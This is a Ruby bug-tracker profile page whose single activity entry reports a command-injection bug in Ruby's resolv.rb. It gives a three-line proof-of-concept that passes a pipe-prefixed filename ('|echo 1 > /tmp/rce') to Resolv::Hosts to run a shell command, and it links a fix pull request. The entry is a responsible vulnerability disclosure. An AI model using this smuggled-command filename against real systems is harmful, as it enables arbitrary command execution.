drigg3r (Jasraj Bedi)
- Login: drigg3r
- Registered on: 12/19/2017
- Last sign in: 12/19/2017
Issues
| open | closed | Total | |
|---|---|---|---|
| Assigned issues | 0 | 0 | 0 |
| Reported issues | 0 | 1 | 1 |
Activity
12/19/2017
-
10:08 AM Ruby master Bug #14205: Unsanitizied filename leads to command injection in 'resolv.rb'
- PoC Concept Code
~~~ ruby
require 'resolv'
a = Resolv::Hosts::new("|echo 1 > /tmp/rce")
a.getaddress("test")
~~~
-
- Here is the pull request
https://github.com/ruby/ruby/pull/1777
Also available in: Atom